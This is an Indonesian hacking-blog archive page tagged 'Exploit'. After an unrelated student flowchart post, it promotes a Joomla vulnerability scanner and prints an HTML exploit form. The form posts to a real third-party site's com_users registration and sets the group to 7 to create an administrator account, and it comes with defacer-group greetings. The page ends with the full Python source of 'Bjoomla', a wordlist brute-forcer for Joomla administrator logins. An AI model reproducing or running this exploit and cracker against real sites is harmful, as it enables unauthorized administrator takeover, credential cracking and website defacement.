Tampilkan postingan dengan label Exploit. Tampilkan semua postingan
Flowchart Lift
Disini kami menggambarkan Flowchart dari Lift 3 Lantai
IRVAN REYNALDI {24113523}
MOHAMMAD YOGIE P. {25113649}
MUHAMMAD MUKSIN {26113036}
Com User Scanner
Oke langsung saja ya. Tools ini berguna seperti JCE Scanner, namun yang
ini untuk checking web vuln com_user dalam satu server. Ini direcode
oleh teman saya ./Pscript . Thanks banget ya om :D .Scanner ini berekstensi .py (file python) .
Berikut link download nya :
Download Com_User Scanner
Simpan dengan ekstensi file.py . Contoh : comuser.py
lalu jalankan lewat cmd. Tinggal masukkan IP Server yang ingin di scan :D
Sekian dan semoga bermanfaat.
Source : Madura Cyber
Berikut link download nya :
Download Com_User Scanner
Simpan dengan ekstensi file.py . Contoh : comuser.py
lalu jalankan lewat cmd. Tinggal masukkan IP Server yang ingin di scan :D
Sekian dan semoga bermanfaat.
Source : Madura Cyber
Tag :
Exploit,
Underground,
Joomla Exploit
Exploit Joomla
<body bgcolor="#000000" background="blank">
<font color=#00ff00>
<br><center><font face="arial" color="RED" size="4">Exploit :
<br>
index.php?option=com_users&view=registration .. /administrator</font><font face="ARIALBLACK"
color="white">
<form id="member-registration" action="http://www.jmccautos.co.uk/index.php?option=com_users&view=registration" method="post" class="form-validate">
<fieldset>
<legend>User Registration</legend><dl><dt><span class="spacer"><span class="before"></span><span class="text"><label id="jform_spacer-lbl" class=""><strong class="red">*</strong> Required field</label></span><span class="after"></span></span> </dt>
<dd> </dd>
<dt>
<label id="jform_name-lbl" for="jform_name" class="hasTip required" title="Name::Enter your full name">Name:<span class="star"> *</span></label> </dt>
<dd><input type="text" name="jform[name]" id="jform_name" value="buitenzorgDot" class="required" size="30"/></dd>
<dt>
<label id="jform_username-lbl" for="jform_username" class="hasTip required" title="Username::Enter your desired user name">Username:<span class="star"> *</span></label> </dt>
<dd><input type="text" name="jform[username]" id="jform_username" value="buitenzorgDot" class="validate-username required" size="30"/></dd>
<dt>
<label id="jform_password1-lbl" for="jform_password1" class="hasTip required" title="Password::Enter your desired password - Enter a minimum of 4 characters">Password:<span class="star"> *</span></label> </dt>
<dd><input type="password" name="jform[password1]" id="jform_password1" value="pe2121genya" autocomplete="off" class="validate-password required" size="30"/></dd>
<dt>
<label id="jform_password2-lbl" for="jform_password2" class="hasTip required" title="Confirm Password::Confirm your password">Confirm Password:<span class="star"> *</span></label> </dt>
<dd><input type="password" name="jform[password2]" id="jform_password2" value="pengenya" autocomplete="off" class="validate-password required" size="30"/></dd>
<dt>
<label id="jform_email1-lbl" for="jform_email1" class="hasTip required" title="Email Address::Enter your email address">Email Address:<span class="star"> *</span></label> </dt>
<dd><input type="text" name="jform[email1]" class="validate-email required" id="jform_email1" value="buitenzorgdotid@gmail.com" size="30"/></dd>
<dt>
<label id="jform_email2-lbl" for="jform_email2" class="hasTip required" title="Confirm email Address::Confirm your email address">Confirm email Address:<span class="star"> *</span></label> </dt>
<dd><input type="text" name="jform[email2]" class="validate-email required" id="jform_email2" value="buitenzorgdotid@gmail.com" size="30"/></dd>
<input name="jform[groups][]" value="7" size="30">
</dl>
</fieldset>
<div>
<span class="wto-button-wrapper"><span class="wto-button-l"> </span><span class="wto-button-r"> </span><button type="submit" class="button validate wto-button">Register</button></span>
or <a href="/" title="Cancel">Cancel</a>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="registration.register" />
<input type="hidden" name="b2e2011231fd253c5ed10cebbb071bdf" value="1" /> </div>
</form>
<hr>
</div></font></center><br><center><font face="arial" color="RED" size="4"><font face="arial" color="white" size="4">#</font>Indonesian </font><font face="arial" color="white" size="4">Hacker</font><font face="ARIALBLACK"
color="white"><marquee direction="left"loop="true" scrollamount="300"
><b>__________________________________________________________________________________________
___________________________________________________________________________________________</b
></marquee></font><script type="text/javascript">
writeContent(true);
</script>
</script><center>
<p dir="ltr" align="center"><span lang="en-us"> <font color="#00FF00" face="Century Gothic">Greetz:</font></span><font color="#00FF00" face="Century Gothic">
<marquee width="591">BuitenZorg Dot ID| all Indonesian Defacer And You !!! </marquee>
</font></p>
</font>
<font face="ARIALBLACK" color="white">
<marquee loop="true" direction="right"
scrollamount="300"><b>________________________________________________________________________
______________________________________________________________________________________________
_______________</b></marquee></font>
</div></font></center><br><center><font face="arial" color="RED" size="4"> JKT48 Cyber Team | Indonesian Security Down | Indonesian Cyber Army </font><font face="ARIALBLACK"
color="white">
<br>
<br>
<font face="Courier New" size="3"><font color="white"><i> NgopyRoot 2013 by <a href="http://tutorial-update.blogspot.com/">BuitenZorg Dot ID</a> </a></i></font><br></p>
</body>
</html>
</body>
</html>
Tag :
Exploit,
Joomla.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import urllib2, urllib
import cookielib
import re
from _abcoll import Container
#
#functions
#
def getToken(contentHtml):
reg = re.compile('<input type="hidden" name="([a-zA-z0-9]{32})" value="1"')
value = reg.search(contentHtml).group(1)
return value
def loadLst(fileName, lstName):
f = open(fileName, 'r')
for line in f:
lstName.append(line.replace('\r\n',''))
f.close()
if len(sys.argv) <= 1:
print 'Bjoomla v3.0 (c)2012 by Zonesec - a very fast logon Joomla Cracker - support all version'
print 'Website: http://www.zonesec.com'
print 'Mail : zonesec@gmail.com'
print ''
print 'Syntax: python BJoomla [-u USER|-U FILE] [-p PASS|-P FILE] -h URL [OPT]'
print ''
print 'Options:'
print '-h URL'
print '-H Filename - URL list from file'
print '-U file contain list user'
print '-P file contain list password'
print '-u username'
print '-p password'
print '-v verbose mode / show login+pass combination for each attempt (no scroll)'
print '-vv verbose mode / show login+pass combination for each attempt'
print '-f continue after found login/password pair'
print '-g user-agent - default: "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"'
print '-x use proxy | ex: 127.0.0.1:1234'
print ''
print 'Examples: python Bjoomla.py -h http://test.com/administrator -u admin -P password.txt'
sys.exit()
print 'Bjoomla v3.0 (c)2012 by Zonesec - a very fast logon Joomla Cracker'
print 'Website: http://www.zonesec.com'
print 'Mail : zonesec@gmail.com'
#
#define variables
#
print ""
url = ''
urlLstFile = '/'
wordlist = ''
username = ''
password = ''
passFile = ''
userFile = ''
signal = 'type="password"'
count = 0
countAcc = 0
mode = 1
verbose = 0
verboseX = 0
useProxy = 0
continues = 0
agent = 'Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0'
result = ""
#
#check argvs
#
for arg in sys.argv:
if arg == '-h':
url = sys.argv[count + 1]
if arg == '-H':
urlLstFile = sys.argv[count + 1]
elif arg == '-u':
username = sys.argv[count + 1]
elif arg == '-U':
userFile = sys.argv[count + 1]
elif arg == '-p':
password = sys.argv[count + 1]
elif arg == '-P':
passFile = sys.argv[count + 1]
elif arg == '-v':
verbose = 1
elif arg == '-s':
signal = sys.argv[count + 1]
elif arg == '-g':
agent = sys.argv[count + 1]
elif arg == '-x':
lstTmp = sys.argv[count+1].split(':')
proxyHandler = urllib2.ProxyHandler({lstTmp[0] : lstTmp[1]+':'+lstTmp[2]})
useProxy = 1
elif arg == '-f':
continues = 1
elif arg == '-vv':
verboseX = 1
count += 1
if (len(username)>0 and len(password)>0):
mode = 1 #single
elif (len(username)>0 and len(passFile)>0):
mode = 2 #
elif (len(userFile)>0 and len(password)>0):
mode = 3
elif (len(userFile)>0 and len(passFile)>0):
mode = 4
#
#init opener
#
cookieJar = cookielib.CookieJar()
cookieHandler = urllib2.HTTPCookieProcessor(cookieJar)
if useProxy == 0:
opener = urllib2.build_opener(cookieHandler)
else:
opener = urllib2.build_opener(proxyHandler,cookieHandler)
opener.addheaders = [('User-agent', agent)]
cookieJar.clear()
cookieJar.clear_session_cookies()
#
#main
#
if urlLstFile != "/":
urlLst = open(urlLstFile,'r')
for url in urlLst:
url = url.strip('\r\n')
print '- Target: ' + url
try:
response = opener.open(url)
content = response.read()
token = getToken(content)
print "- Token:" + token
print ''
if mode == 1:
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
data = urllib.urlencode(values)
response = opener.open(url+'/', data)
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if mode == 2:
f = open(passFile,'r')
for line in f:
password = line.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose == 1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " " + "\r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
break;
if mode == 3:
f = open(userFile,'r')
for line in f:
username = line.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose == 1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if continues == 0:
break
cookieJar.clear()
cookieJar.clear_session_cookies()
response = opener.open(url)
content = response.read()
token = getToken(content)
if mode == 4:
f = open(userFile,'r')
f2 = open(passFile,'r')
#passwordArr = f2.readlines()
for line in f:
username = line.strip('\n\r')
f2.seek(0)
for line2 in f2:
token = getToken(content)
password = line2.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose ==1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if continues == 0:
raise;
cookieJar.clear()
cookieJar.clear_session_cookies()
response = opener.open(url)
content = response.read()
token = getToken(content)
f.close()
f2.close()
except urllib2.URLError, e:
print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
pass
except (KeyboardInterrupt):
print "\n\t[!] Session cancelled"
pass
#Finish
print ' '
print '* RESULT:'
print '- 1 target successfuly completed, '+ str(countAcc) +' valid username+password found '
print '- TARGER: ' + url
print result
result = ''
countAcc = 0
print '-----------------------------------------------------------------'
print ''
urlLst.close()
sys.exit()
#
#single Url
#
try:
response = opener.open(url)
content = response.read()
token = getToken(content)
print "Token:" + token
print ''
if mode == 1:
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
data = urllib.urlencode(values)
response = opener.open(url+'/', data)
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if mode == 2:
f = open(passFile,'r')
for line in f:
password = line.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose == 1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " " + "\r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
break;
if mode == 3:
f = open(userFile,'r')
for line in f:
username = line.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose ==1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if continues == 0:
break
cookieJar.clear()
cookieJar.clear_session_cookies()
response = opener.open(url)
content = response.read()
token = getToken(content)
if mode == 4:
f = open(userFile,'r')
f2 = open(passFile,'r')
#passwordArr = f2.readlines()
for line in f:
username = line.strip('\n\r')
f2.seek(0)
for line2 in f2:
token = getToken(content)
password = line2.strip('\n\r')
values = {'username' : username,
'passwd' : password,
token : '1',
'option' : 'com_login',
'task' : 'login',
'lang' : 'Default' }
if verboseX == 1:
print "Trying u--p : " + username + " -- " + password
elif verbose ==1:
sys.stdout.write("Trying u--p : " + username + " -- " + password + " \r")
sys.stdout.flush()
data = urllib.urlencode(values)
try:
response = opener.open(url+'/', data)
except urllib2.URLError, e:
continue
strTmp = response.read()
if strTmp.find(signal) < 0:
countAcc += 1
result += "username: " + username + " password: " + password + "\n"
print "Valid user--pass: " + username + " -- " + password
if continues == 0:
raise;
cookieJar.clear()
cookieJar.clear_session_cookies()
response = opener.open(url)
content = response.read()
token = getToken(content)
f.close()
f2.close()
except urllib2.URLError, e:
print "\n\t[!] Session Cancelled; Error occured. Check internet settings"
pass
except (KeyboardInterrupt):
print "\n\t[!] Session cancelled"
pass
#Finish
print '-----------------------------------------------------------------'
print '- 1 target successfuly completed, '+ str(countAcc) +' valid username+password found '
print '- TARGER: ' + url
print '- RESULT:'
print result
sys.exit()
Tag :
Exploit,
